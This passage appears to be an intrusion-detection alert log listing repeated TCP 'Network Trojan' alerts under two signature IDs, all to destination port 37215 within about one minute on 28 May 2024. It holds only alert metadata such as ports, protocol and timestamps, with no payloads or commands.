          SID:2829579
          Source Port:59772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.240827
          SID:2829579
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958628
          SID:2829579
          Source Port:44726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299387
          SID:2835222
          Source Port:57174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125781
          SID:2829579
          Source Port:50216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742376
          SID:2835222
          Source Port:53220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.857232
          SID:2829579
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796188
          SID:2835222
          Source Port:55120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336886
          SID:2829579
          Source Port:36102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044588
          SID:2829579
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547313
          SID:2829579
          Source Port:47892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890809
          SID:2829579
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555172
          SID:2835222
          Source Port:59582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627790
          SID:2829579
          Source Port:52864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155023
          SID:2829579
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626712
          SID:2835222
          Source Port:43722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848420
          SID:2829579
          Source Port:47650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892913
          SID:2829579
          Source Port:46080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161983
          SID:2829579
          Source Port:54170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.702609
          SID:2829579
          Source Port:36402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241069
          SID:2835222
          Source Port:57544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669123
          SID:2835222
          Source Port:58988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594197
          SID:2835222
          Source Port:49934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820488
          SID:2829579
          Source Port:52968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527869
          SID:2829579
          Source Port:46338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156295
          SID:2835222
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235733
          SID:2835222
          Source Port:59886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529967
          SID:2829579
          Source Port:44464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923313
          SID:2835222
          Source Port:46630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811607
          SID:2829579
          Source Port:59378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143807
          SID:2829579
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717998
          SID:2835222
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271420
          SID:2829579
          Source Port:48376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652437
          SID:2835222
          Source Port:45810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526473
          SID:2829579
          Source Port:45016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175782
          SID:2835222
          Source Port:43008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771641
          SID:2835222
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842194
          SID:2835222
          Source Port:37920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185885
          SID:2835222
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983715
          SID:2835222
          Source Port:39776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656623
          SID:2835222
          Source Port:58202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960694
          SID:2835222
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277999
          SID:2835222
          Source Port:55210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712054
          SID:2829579
          Source Port:38658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114372
          SID:2835222
          Source Port:44156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161709
          SID:2829579
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327795
          SID:2829579
          Source Port:39590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272276
          SID:2835222
          Source Port:35602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301169
          SID:2835222
          Source Port:45236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211688
          SID:2835222
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019407
          SID:2829579
          Source Port:49360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.995610
          SID:2835222
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135976
          SID:2829579
          Source Port:49040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803810
          SID:2829579
          Source Port:55778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653022
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803290
          SID:2829579
          Source Port:44924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341184
          SID:2829579
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222408
          SID:2835222
          Source Port:34348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943208
          SID:2829579
          Source Port:56564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466158
          SID:2829579
          Source Port:41442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298878
          SID:2829579
          Source Port:54002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545907
          SID:2829579
          Source Port:37148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684956
          SID:2835222
          Source Port:53126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221755
          SID:2829579
          Source Port:49368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536803
          SID:2835222
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.514181
          SID:2829579
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863251
          SID:2835222
          Source Port:42796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914188
          SID:2829579
          Source Port:56778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124685
          SID:2829579
          Source Port:60200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537982
          SID:2835222
          Source Port:56502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115780
          SID:2835222
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847523
          SID:2835222
          Source Port:52404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051259
          SID:2835222
          Source Port:34020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.616880
          SID:2829579
          Source Port:46716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202940
          SID:2835222
          Source Port:45948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942299
          SID:2835222
          Source Port:36634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709033
          SID:2829579
          Source Port:55066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592104
          SID:2829579
          Source Port:59700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175816
          SID:2835222
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839608
          SID:2829579
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597259
          SID:2829579
          Source Port:36624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414731
          SID:2829579
          Source Port:57654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797630
          SID:2835222
          Source Port:51584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497173
          SID:2835222
          Source Port:48372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874242
          SID:2835222
          Source Port:34560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949827
          SID:2829579
          Source Port:36624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466424
          SID:2835222
          Source Port:35888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272251
          SID:2829579
          Source Port:49186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933521
          SID:2829579
          Source Port:42606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403252
          SID:2829579
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294647
          SID:2829579
          Source Port:34800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299152
          SID:2835222
          Source Port:36686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474185
          SID:2835222
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466121
          SID:2835222
          Source Port:48136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891648
          SID:2835222
          Source Port:45702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214148
          SID:2829579
          Source Port:50250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543091
          SID:2829579
          Source Port:34726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341297
          SID:2829579
          Source Port:56214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681631
          SID:2829579
          Source Port:59034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527197
          SID:2835222
          Source Port:45528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248849
          SID:2835222
          Source Port:47852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136865
          SID:2829579
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535261
          SID:2829579
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708553
          SID:2835222
          Source Port:42134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231086
          SID:2829579
          Source Port:39414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211471
          SID:2829579
          Source Port:52964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361494
          SID:2829579
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989077
          SID:2829579
          Source Port:39014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650324
          SID:2835222
          Source Port:48714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210426
          SID:2835222
          Source Port:39408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806802
          SID:2829579
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195412
          SID:2829579
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976670
          SID:2829579
          Source Port:59176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161428
          SID:2835222
          Source Port:56754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796943
          SID:2835222
          Source Port:36230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324245
          SID:2829579
          Source Port:60056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893215
          SID:2829579
          Source Port:54632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680293
          SID:2829579
          Source Port:50796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930466
          SID:2835222
          Source Port:42588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625710
          SID:2835222
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710136
          SID:2829579
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.088843
          SID:2829579
          Source Port:56850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537513
          SID:2835222
          Source Port:47478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849218
          SID:2835222
          Source Port:51786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865422
          SID:2829579
          Source Port:59892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861167
          SID:2835222
          Source Port:55206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242773
          SID:2829579
          Source Port:41638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838605
          SID:2835222
          Source Port:59798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925864
          SID:2835222
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923734
          SID:2835222
          Source Port:38210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271885
          SID:2835222
          Source Port:56972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510252
          SID:2829579
          Source Port:37420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462636
          SID:2835222
          Source Port:54156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321141
          SID:2829579
          Source Port:35306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527385
          SID:2829579
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283881
          SID:2829579
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725127
          SID:2829579
          Source Port:59828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933522
          SID:2835222
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328551
          SID:2829579
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820988
          SID:2835222
          Source Port:51584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090408
          SID:2829579
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216598
          SID:2835222
          Source Port:53600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847593
          SID:2835222
          Source Port:38130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146325
          SID:2829579
          Source Port:52988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561779
          SID:2835222
          Source Port:40426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355855
          SID:2829579
          Source Port:35572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486784
          SID:2829579
          Source Port:35258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482834
          SID:2829579
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742237
          SID:2829579
          Source Port:42928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298414
          SID:2835222
          Source Port:52646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543137
          SID:2829579
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164488
          SID:2835222
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597692
          SID:2829579
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422578
          SID:2829579
          Source Port:52314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770386
          SID:2829579
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020328
          SID:2835222
          Source Port:34030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806486
          SID:2835222
          Source Port:33812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938169
          SID:2835222
          Source Port:59430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677736
          SID:2829579
          Source Port:34854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130741
          SID:2829579
          Source Port:42510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914323
          SID:2829579
          Source Port:38038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186124
          SID:2835222
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891681
          SID:2835222
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277045
          SID:2829579
          Source Port:53750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195151
          SID:2829579
          Source Port:33770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709291
          SID:2829579
          Source Port:43528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742274
          SID:2829579
          Source Port:42460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611313
          SID:2835222
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920054
          SID:2829579
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297323
          SID:2829579
          Source Port:59812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590655
          SID:2829579
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979342
          SID:2829579
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590503
          SID:2835222
          Source Port:40028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977532
          SID:2835222
          Source Port:54352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794134
          SID:2835222
          Source Port:56230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210027
          SID:2829579
          Source Port:60278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919027
          SID:2829579
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177240
          SID:2829579
          Source Port:47344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547309
          SID:2835222
          Source Port:49310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652331
          SID:2829579
          Source Port:36646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984881
          SID:2835222
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298086
          SID:2829579
          Source Port:43198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.815237
          SID:2835222
          Source Port:44600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878329
          SID:2829579
          Source Port:51580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713510
          SID:2835222
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.370769
          SID:2835222
          Source Port:51074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636836
          SID:2829579
          Source Port:41868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878755
          SID:2829579
          Source Port:54338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271380
          SID:2835222
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041370
          SID:2835222
          Source Port:42182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974934
          SID:2835222
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.690321
          SID:2829579
          Source Port:45294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803384
          SID:2829579
          Source Port:39652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284960
          SID:2835222
          Source Port:56072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300050
          SID:2829579
          Source Port:44348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213757
          SID:2829579
          Source Port:47992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183422
          SID:2835222
          Source Port:36372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982907
          SID:2835222
          Source Port:52358
          Destination Port:37215
